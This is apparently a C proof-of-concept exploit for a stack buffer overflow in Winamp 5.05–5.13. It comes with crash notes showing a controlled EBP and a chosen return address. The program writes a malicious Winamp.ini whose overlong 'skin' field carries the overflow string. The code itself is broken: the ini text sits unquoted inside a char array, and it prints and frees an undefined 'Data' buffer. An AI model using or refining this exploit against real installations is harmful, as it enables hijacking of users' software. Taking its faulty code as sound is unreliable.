/*Winamp 5.05-5.13 .ini local stack buffer overflow poc
The problem is in the skin field when a long string is
writen it causes the buffer overflow.
All u have to do is replace this file with the initial one. 
-snipp--
[Winamp]
visplugin_name=vis_avs.dll
visplugin_num=0
mw_open=1
outname=out_ds.dll
proxyonly80=0
Proxy=
inet_mode=0
langpack=
skin=long string
-snipp--
Registers
EAX 001E0A17
ECX 00008E3E
EDX 7C90EB94 ntdll.KiFastSystemCallRet
EBX 004C0304 winamp.004C0304
ESP 0012965C ASCII "edit.txt"
EBP 41414141   ->controled
ESI 77D5355A USER32.GetSubMenu
EDI 00009D85
EIP 6C705C41
Stack:
0012914A   41414141
0012914E   41414141
00129152   41414141
00129156   41414141
0012915A   41414141
0012915E   41414141
00129162   41414141
....................
77F30A7A   5D               POP EBP
77F30A7B   C3               RETN
 "\x7A\x0A\xF3\x77"
*/
#include<stdio.h>
#include<string.h>

#define Fil3 "Winamp.ini"
    char data[]=
    {
       [Winamp]
       visplugin_name=vis_avs.dll
       visplugin_num=0
       mw_open=1
       outname=out_ds.dll
       proxyonly80=0  
       Proxy=   
       inet_mode=0  
       langpack=
       skin=AAAAAAAAAAAAAAAAAAAABBBBBBBBBBrQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2dREbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoaMeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxSnqPTGfRyilOYGxlSXPtLJboH8S4kwIgTxSl1C00GOzOLMrbAyfKUUT2222Rblsaqv6UpdvNIsNr
       defext=mp3
       titlefmt=[%artist% - ]$if2(%title%,$filepart(%filename%))
       dspplugin_name=
       check_ft_startup=1
       pe_fontsize=11
       visplugin_priority=2
       visplugin_autoexec=0
       dspplugin_num=0
       sticon=0
       splash=0
       taskbar=0
       dropaotfs=1
       ascb_new=1
       ttips=1
       riol=0
       minst=0
       whichicon=1
       whichicon2=1
       addtolist=0
       snap=1
       snaplen=10
       parent=1
       hilite=1
       disvis=1
       rofiob=0
       shownumsinpl=1
       keeponscreen=1
       eqdsize=1
       usecursors=1
       fixtitles=3
       priority=1
       shuffle_morph_rate=50
       useexttitles=1
       bifont=0
       ospb=0
       embedwnd_freesize=0
       no_visseh=0
       newverchk=11413
       newverchk2=0
       last_shortdesc=
       last_shorturl=
       prefs_last_page=552
       autoload_eq=0
       use_eq=1
       eq_ws=0
       wx=26
       wy=29
       minimized=0
       aot=0
       shuffle=0
       repeat=1
       volume=82
       pan=0
       easymove=1
       dsize=0
       timeleftmode=0
       autoscrollname=1
       sa=1
       safire=4
       saref=2
       safalloff=2
       sa_peaks=1
       sa_peak_falloff=1
       eq_wx=26
       eq_wy=145
       eq_open=1
       pe_wx=26
       pe_wy=261
       pe_open=1
       pe_width=275
       pe_height=145
       pe_height_ws=
       mb_wx=301
       mb_wy=29
       mb_open=0
       mb_width=350
       mb_height=348
       video_wx=26
       video_wy=145
       video_open=0
       video_width=275
       video_height=232
       video_ratio1=4
       video_ratio2=3
       video_useratio=0
       windowshade=0
       preamp=31
       pilp=0
       randskin=0
       cwd=G:\Program Files\Winamp
       pladv=1
       eq_data=32,22,31,41,40,31,19,16,16,17
       video_vsync=0
       video_aspectadj=1
       video_overlays=1
       video_ddraw=1
       video_updsize=1
       video_autoopen=1
       video_autoclose=1
       video_noss=1
       video_osd=1
       video_yv12=1
       video_stopclose=1
       video_remove_fs_on_stop=0
       wav_do_header=1
       wav_convert=0
       wav_ext=WAV
       playlist_custom_font=Arial
       custom_plfont=0
       [WAV Writing Output Driver]
       config_waveoutdir=c:\
       cfg_cvt=
       cfg_wav1=
       cfg_wav1p=c:\out.wav
cfg_mode=
cfg_thread=
cfg_killsilence=
cfg_wfx_s=18
cfg_wfx=0100020044AC000010B10200040010000000CA
cfg_wfx1=0100020044AC000010B10200040010000000CA
[gen_ff]
classicplws=0
classicplwidth=275
classicplheight=145
classicmw=1
classiceq=1
[out_ds]
cfg_total_time=54A15F08000000005C
[AVS]
smp=0
smp_mt=2
wx=32
wy=32
ww=300
wh=232
config_pres_subdir=
cfg_docked=0
cfg_cfgwnd_open=0
cfg_cfgwnd_x=50
cfg_cfgwnd_y=50
cfg_fs_w=0
cfg_fs_h=0
cfg_fs_d=2
cfg_fs_bpp=0
cfg_fs_fps=6
cfg_fs_rnd=1
cfg_fs_rnd_time=10
cfg_fs_dblclk=1
cfg_fs_flip=0
cfg_fs_height=80
cfg_fs_use_overlay=0
cfg_fs_cancelondeactivate=1
cfg_speed=5
cfg_trans=0
cfg_dont_min_avs=0
cfg_smartbeat=0
cfg_smartbeatsticky=1
cfg_smartbeatresetnewsong=1
cfg_smartbeatonlysticky=0
cfg_transitions_en=4
cfg_transitions_preinit=36
cfg_transitions_speed=8
cfg_transitions_mode=32769
cfg_bkgnd_render=0
cfg_bkgnd_render_color=2031631
cfg_render_prio=0
g_preset_dirty=0
cfg_prompt_save_preset=1
last_preset_name=
cfg_reuseonresize=1
cfg_log_errors=0
cfg_reset_vars=1
cfg_seh=1
debugreg_0=0
debugreg_1=1
debugreg_2=2
debugreg_3=3
debugreg_4=4
debugreg_5=5
debugreg_6=6
debugreg_7=7
 
    };    
    char header[]=
    { 
       "*******************************************************\n"
       "  Winamp 5.05-5.13 .ini local stack buffer overflow poc\n"
       "       by fl0 fl0w                                     \n" 
       "*******************************************************\n"
    };
/*----------prototypes---------*/
     int fmake(char*);
     void print(char*);
/*-----main-----------*/
    int main()
    {  
        printf("%s",header);
        fmake(Fil3);
        getchar();
             return 0;
    }
    int fmake(char* fname)
    {
      FILE *f=fopen(fname,"wb");
           if(f==NULL)
           {
              print("File eror");  
              exit(0);
           }
            fprintf(f,"%s",Data);
            fclose(f); free(Data);
            print("Winamp.ini file Done!");
                      return 0;        
    }
    void print(char* msg)
   {
     printf("\n[*]%s\n",msg);
   }